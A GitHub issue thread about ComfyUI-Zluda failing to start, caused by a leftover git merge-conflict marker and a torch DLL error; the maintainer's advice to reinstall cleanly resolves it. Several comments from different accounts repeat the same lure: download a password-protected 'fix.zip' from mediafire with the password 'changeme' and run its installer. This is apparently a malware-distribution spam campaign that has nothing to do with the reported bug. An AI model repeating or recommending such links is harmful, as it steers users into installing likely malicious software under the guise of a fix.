### ISSUE TITLE
start.bat update and fail to open

### ISSUE THREAD

**Issue by waldo870** [patientx/ComfyUI-Zluda#19]
### Expected Behavior

run start.bat and open open comfyui

### Actual Behavior

it update and fail to open

### Steps to Reproduce

run start.bat and cant  open comfyui
and i delete the venv and reinstall again but still fail
so I git clone again and install again  but still fail

### Debug Logs

```powershell
## ComfyUI-Manager: installing dependencies done.
[2024-08-26 18:22] ** ComfyUI startup time: 2024-08-26 18:22:00.373894
[2024-08-26 18:22] ** Platform: Windows
[2024-08-26 18:22] ** Python version: 3.10.6 (tags/v3.10.6:9c7b4bd, Aug  1 2022, 21:53:49) [MSC v.1932 64 bit (AMD64)]
[2024-08-26 18:22] ** Python executable: D:\ComfyUI-Zluda\venv\Scripts\python.exe
[2024-08-26 18:22] ** ComfyUI Path: D:\ComfyUI-Zluda
[2024-08-26 18:22] ** Log path: D:\ComfyUI-Zluda\comfyui.log
[2024-08-26 18:22] 
Prestartup times for custom nodes:
[2024-08-26 18:22]    1.7 seconds: D:\ComfyUI-Zluda\custom_nodes\ComfyUI-Manager
[2024-08-26 18:22] 
Traceback (most recent call last):
[2024-08-26 18:22]   File "D:\ComfyUI-Zluda\main.py", line 75, in <module>
[2024-08-26 18:22]     import cuda_malloc
[2024-08-26 18:22]   File "D:\ComfyUI-Zluda\cuda_malloc.py", line 70
[2024-08-26 18:22]     >>>>>>> 902d97af7dfff374c5ab3234296a05f7194afc06
[2024-08-26 18:22]               ^
[2024-08-26 18:22] SyntaxError: invalid decimal literal

## ComfyUI-Manager: installing dependencies done.
[2024-08-26 18:21] ** ComfyUI startup time: 2024-08-26 18:21:58.372117
[2024-08-26 18:21] ** Platform: Windows
[2024-08-26 18:21] ** Python version: 3.10.6 (tags/v3.10.6:9c7b4bd, Aug  1 2022, 21:53:49) [MSC v.1932 64 bit (AMD64)]
[2024-08-26 18:21] ** Python executable: D:\ComfyUI-Zluda\venv\Scripts\python.exe
[2024-08-26 18:21] ** ComfyUI Path: D:\ComfyUI-Zluda
[2024-08-26 18:21] ** Log path: D:\ComfyUI-Zluda\comfyui.log
[2024-08-26 18:21] 
Prestartup times for custom nodes:
[2024-08-26 18:21]    1.7 seconds: D:\ComfyUI-Zluda\custom_nodes\ComfyUI-Manager
[2024-08-26 18:21] 
Traceback (most recent call last):
[2024-08-26 18:21]   File "D:\ComfyUI-Zluda\main.py", line 75, in <module>
[2024-08-26 18:21]     import cuda_malloc
[2024-08-26 18:21]   File "D:\ComfyUI-Zluda\cuda_malloc.py", line 70
[2024-08-26 18:21]     >>>>>>> 902d97af7dfff374c5ab3234296a05f7194afc06
[2024-08-26 18:21]               ^
[2024-08-26 18:21] SyntaxError: invalid decimal literal

## ComfyUI-Manager: installing dependencies done.
[2024-08-26 18:21] ** ComfyUI startup time: 2024-08-26 18:21:49.470880
[2024-08-26 18:21] ** Platform: Windows
[2024-08-26 18:21] ** Python version: 3.10.6 (tags/v3.10.6:9c7b4bd, Aug  1 2022, 21:53:49) [MSC v.1932 64 bit (AMD64)]
[2024-08-26 18:21] ** Python executable: D:\ComfyUI-Zluda\venv\Scripts\python.exe
[2024-08-26 18:21] ** ComfyUI Path: D:\ComfyUI-Zluda
[2024-08-26 18:21] ** Log path: D:\ComfyUI-Zluda\comfyui.log
[2024-08-26 18:21] 
Prestartup times for custom nodes:
[2024-08-26 18:21]    1.7 seconds: D:\ComfyUI-Zluda\custom_nodes\ComfyUI-Manager
[2024-08-26 18:21] 
Traceback (most recent call last):
[2024-08-26 18:21]   File "D:\ComfyUI-Zluda\main.py", line 83, in <module>
[2024-08-26 18:21]     import comfy.utils
[2024-08-26 18:21]   File "D:\ComfyUI-Zluda\comfy\utils.py", line 20, in <module>
[2024-08-26 18:21]     import torch
[2024-08-26 18:21]   File "D:\ComfyUI-Zluda\venv\lib\site-packages\torch\__init__.py", line 141, in <module>
[2024-08-26 18:21]     raise err
[2024-08-26 18:21] OSError: [WinError 126] 找不到指定的模組。 Error loading "D:\ComfyUI-Zluda\venv\lib\site-packages\torch\lib\caffe2_nvrtc.dll" or one of its dependencies.
```

### Other

i try to fix the line 70 but still fail
D:\ComfyUI-Zluda\cuda_malloc.py", line 70

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by patientx** [comment]
I changed a setting, try to run again if all fails, delete comfy folder all together and start from zero.

**Comment by waldo870** [comment]
Thank you for your help.
I have deleted it and git clone reinstall again and it fixed.
It fixed and It works.  I get some problems about the path.
and check and rewrite extra_model_paths.yaml and nodes step by step.  
i delete the node of ComfyUI-Impact-Pack, and git clone again. Finally, it works!
some problems I don't know why running start.bat updating and have a mistake.

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
